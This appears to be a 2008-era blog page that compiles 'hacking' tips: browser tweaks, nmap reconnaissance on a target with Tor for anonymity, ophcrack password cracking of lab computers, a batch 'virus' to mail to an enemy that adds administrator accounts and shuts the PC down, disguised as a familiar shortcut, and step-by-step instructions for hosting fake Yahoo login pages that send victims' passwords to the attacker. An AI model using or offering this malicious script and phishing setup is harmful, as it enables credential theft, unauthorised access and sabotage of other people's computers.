Your Ad Here

Speed Up Firefox Browser

In address bar of your browser type "about:config", reset the values of given entries and if that value doesn't exist then right click to create a new one.


type ---> property name---> value to be set

bool--->"network.http.pipelining"---->true
bool--->"network.http.proxy.pipelining"--->true
integer--->"network.http.pipelining.maxrequests"-->8
integer--->"network.http.max-connections"---->48
integer--->"network.http.max-connections-per-server"--->16
integer--->"network.http.max-persistent-connections-per-proxy"--->16
integer--->"network.http.max-persistent-connections-per-server"--->8
integer--->"content.notify.backoffcount"--->5
interger--->"content.max.tokenizing.time"---->2250000
integer--->"content.notify.interval"--->750000
integer--->"content.switch.threshold"--->750000

bool--->"content.notify.ontimer"--->true
bool--->"content.interrupt.parsing"--->true
integer--->"nglayout.initialpaint.delay"--->0
integer--->"browser.cache.memory.capacity"--->65536

Journey Begins - First Step to hacking

To start with this tutorial you must be ready with following :
1. A port scanner Utility like nmap or superscan and experiment with them so that you can use them.......
nmap can be downloaded from insecure.org
2.A good anonymity like TOR or Wingate.
3.Desire to learn and research.

Tutorial:
1. Use port scanner to know what ports are opened in the target system.

Example command: nmap -sS 12.12.12.21

Result will look like below,

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2007-07-12 05:07 EST
Interesting ports on 12.12.12.21
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

2. Try to find the exact version of services

Example command: nmap -sV –version-all host.com

3. Search for existing vulnerabilities for this exact service version.
4. Analyze the changelog details of soft wares in their release notes.
5. Now, you can know the security problems of this abc service and its 1.xx version.
6. Understand how the attacks will be deployed for this.

These are not just steps; you have to work/retry hard to get positive results. And don’t try these against google.com or yahoo.com

After the basics, you have to consider about your anonymity. Don’t use simple proxies for anonymity. Try different networks such as TOR . Don’t use the formal techniques always.

All above things are just basics to understand security problems and attacks. Start preventing your system/network from attackers after knowing everything about attacks.

P.S : For learning purpose only.
: First try it on other computers on same router as you.
: Try for long forgotten sites which are not maintained now so that you can find vulnerabilities and their exploits.

TOR-A Must Have Tool for Security & Anonymous Surfing

Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

Tor: Overview

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.

Why we need Tor

Using Tor protects you against a common form of Internet surveillance known as “traffic analysis.” Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you’re travelling abroad and you connect to your employer’s computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.

How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that’s an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you’re doing and, possibly, what you’re saying. That’s because it focuses on the header, which discloses source, destination, size, timing, and so on.



Download Link: http://www.torproject.org/download.html.en
Home Page: http://tor.eff.org/index.html.en

Feedburner hack: how to get 2500 subscribers overnight (video)

Taken From : http://thenextweb.org/2008/08/04/feedburner-hack-how-to-get-2500-subscribers-overnight-video/

Established blogs like ReadWriteWeb and Techcrunch proudly show a Feedburner chicklet that displays the sites popularity. But beware – since people are more likely to subscribe to a site with a bigger amount of readers, some sites manipulate the counter.
Every once and a while co-editor Patrick and I stumble on a shady looking website with a ton of readers. That made us wonder whether Feedburner is hackable. I’ve sacrificed my personal blog for a hacking experiment and the result; faking your subscriber count IS possible!
We found an easy way to hack Feedburner (Not the obvious hack that simply steals a chicklet from a popular site). Looking at the subscriber count at some sites, we’re not the first ones who found out, but we are the first ones to write it down. All it takes is an OPML file, a Netvibes Universe, and a good night’s sleep.
EDIT: While the hack still works, I am happy to tell you that Google and Netvibes are working on a solution to the problem. Steve Olechowski, co-founder Feedburner mailed me and said: “These things happen occasionally and are usually fixed in a couple of days”, he added that the feedburner counts do not influence advertisement measurement. Franck Mahon from Netvibes said: “We are working on a fix to filter out in the reporting the duplicates while still allowing people to add several instances of the widget to their startpage.” When things get fixed, it would be interesting to see the differences on some sites.
How to manipulate your Feedburner subscribers in two minutes

Watch Video:
http://www.vimeo.com/1463913

Moral of the story is: everybody can have a lot of Feedburner readers, which makes the service questionable as a measurement of performance. It’s up to Google/Feedburner to fix things up.
Once they do this, it will be very interesting to see which blogs suddenly lose a bunch of subscribers…

Above was from : Joop Dorresteijn

Tip to Crack Windows Xp or VISTA password......

In case of Windows 98 it was really easy to crack the user login password....
Just look for log files reverse the XOR and eureka...you got the password......

But in case of Vista and Xp the case is different because they use hash for encoding which is a one way encryption and almost impossible to crack without any software or live CD.

So here is the process easy and simple that any one can follow.......

Go to http://ophcrack.sourceforge.net/ and download iso file.......

Burn that file with any burning software like Nero, magic ISO, Daemon etc......
Screenshot 1:
Boot from this CD on target computer and it will detect all hash files on the target computer and crack the password for you.......

Screenshot 2:



A nice trick to take to your college or school computer lab......

Video:


PS: ophcrack is a big file and will take some time to download even on broadband...

ATS Chief Challeges Hackers


Flooded with offers of help from ethical hackers to track down Indian Mujahideen operatives who sent dire emails minutes after the blasts in Ahmedabad and Delhi, the Anti-Terrorism Squad has devised a stringent test.ATS top boss Hemant Karkare gives all applicants a simple task which has so far turned out to be surprisingly tough: Hack into my e-mail. So far no one has succeeded."I welcome anyone trying to help the police but since I cannot hire anyone and everyone, I decided to test their abilities. I asked them to hack into my e-mail account. So far, no one has got back to me. So what's the point of hiring them?" says Karkare.Police take the help of hackers when they want to access a suspect's e-mail account without letting him or her know he is under investigation. Among the various ways of getting access into a suspect's account is the art of fooling him. A hacker generally sends a mail to the suspect luring him to click on a link sent in the mail. As the suspect clicks on the link he is directed to a page created by the hacker. The page asks the suspect to log in again and as soon as he puts in his password, it reaches the hacker. However, for such methods to be successful the hacker has to be really smart and be able to fool the suspect.Ever since Indian Mujahideen sent e-mails to TV channels warning about the blasts, the ATS has been flooded with offers from ethical hackers to help track down the sender.Actually, till recently, police often sought help from ethical hackers to deal with the increase in technology-related crimes, as their personnel were not trained to handle such problems. An ATS officer says not wishing to be quoted on-record, "There are many hackers who are plain irresponsible and know very little. After helping us in one operation, they go around town boasting about their association with the police to raise their own stock. Some hackers waste a lot of our time citing various reasons and do not come up with results for the simple reason that they know nothing. Security agencies should be wary of such people."No wonder, Karkare says, "I am largely disappointed with the hackers' community."On the other hand, hackers claim the best among them are not coming forward to help the police because they are asked to work for free. Says a hacker who has assisted the police in several cases, "I can do it for free once, twice or 10 times. But after that the police must think of giving some remuneration for the hard work."Karkare, however, insists the police would not flinch from paying if they got good talent. "We are ready to pay any amount provided they show they are worth it," he says.Apparently, several psychologists too have been sending e-mails or calling the ATS chief offering to help. But when the ATS seeks their help, they insist on 'entering into a contract'. Police say they cannot do any such thing without testing their abilities.

Get Free Rapidshare Account

The process is easy but takes almost a weeks time to get a free Rapidshare Premium Account ....
Actually the account is not for free it is an earned .........

Various ways to earn Rapidshare Premium account are.........
1. Upload data files of more than 5 M.B size and as people will download files you earn points. This can take a lot of time if you don't have fan following on net.....

2. Other method is to go to paypal.com and sign up for a premier account. Skip the debit card portion as it is not compulsory. You can opt for it if you want to shop through your own bucks.

Now go to awsurveys.com sign up there and get fill feedback for few sites and you will earn half the paypal balance you require for the account and rest half you will get almost in a weak time when other adds apear on that site.

I've got mine account using this method.
Give it a try will not take more then 15 minutes.

Funny Virus for friends

his virus can be used to create headache to ur enemy or friend. Imagine if ur enemy needs to delete many user accounts that are created by u....??
type the following code in notepad and save it as headache.bat and mail to ur enemy.


echo off
Net localgroup administrator Dont a /add
Net localgroup administrator BE b /add
Net localgroup administrator AFRAID c /add
Net localgroup administrator IT g /add
Net localgroup administrator IS a /add
Net localgroup administrator NOT f /add
Net localgroup administrator A s /add
Net localgroup administrator VIRUS h /add
Net localgroup administrator JUST a /add
Net localgroup administrator CHECKING l /add
Net localgroup administrator A o /add
Net localgroup administrator NEW p /add
Net localgroup administrator PROJECT q /add
Net localgroup administrator DONT a /add
Net localgroup administrator ABUSE a /add
Net localgroup administrator ME a /add
Net user BUT a /add
Net user KICK a /add
Net user ASS a /add
Net user OF a /add
Net user YOUR a /add
Net user ANTIVIRUS a /add
Net user THIS a /add
Net user PROJECT a /add
Net user WONT a /add
Net user HARM a /add
Net user YOUR a /add
Net user PC a /add
shutdown -f -t 0




Place the .bat file link in any autorun.exe file or put it in startup or just make a shortcut of the file, place it on desktop and rename it with any shortcut your friend often uses.....

To change icon:

1) Right-click on the shortcut to bring up the context menu
2) Select the Properties command there
3) Press "Change Icon..." button
4) Select new icon there

More fakes for other sites......

More fakes for other sites are available here.....

Follow the same procedure

http://rapidshare.com/files/147936161/more_fakes_.rar


Fakes of yahoo, hotmail, gmail, orkut, facebook, myspace, hi5, paypal, rapidshare, ebay, runescape & photobucket are available

Yahoo email id hack............

Its been quite a hype about

How to hack the email id of a person........
How do I get a persons password......
all this is quite common and it is asked mainly by all those who don't even know what networking is or what is a server................

so how can such a person can hack into servers (like yahoo, google)which even professionals can't get into...........

most simple way is

INSTRUCTIONS:
1)Just download this file......just a 13kB zip file containing yahoo fake pages......
2)Extract the contents to of a folder
3)Edit mailer.php file with notepad and keep the email ID where you want hacked passwords to come as.
4)Uplaod all the 3 pages Loginerror.html ,index.html,mailer.php to a free webhost site
5)Send the site link to the victim
6)When he logs in tha uploaded yahoo fake page ,The ID pass which the victim entered will be sent to the email ID which you entered in mailer.php file.


Try it out........most simple way.......


More instructions......

*You need a hosting account with PHP installed.
If you do not have one you can make one for free @ http://www.tripod.lycos.co.uk/ or http://www.igotfree.com or search for more webhosts with PHP support , no forced ads.

*You only need to change 2 variables in this script.
- ($to = "Put_Email_Here@yahoo.com";) Email
- ($mailOrText = "YeS";) "yes" for email "no" for text file on server

*Place YOUR email between the quotes $to = "emailid@yahoo.com";

*Upload ALL the files to the server!

If you are not able to upload files in lycos then use some other server the best is
"www.ripway.com"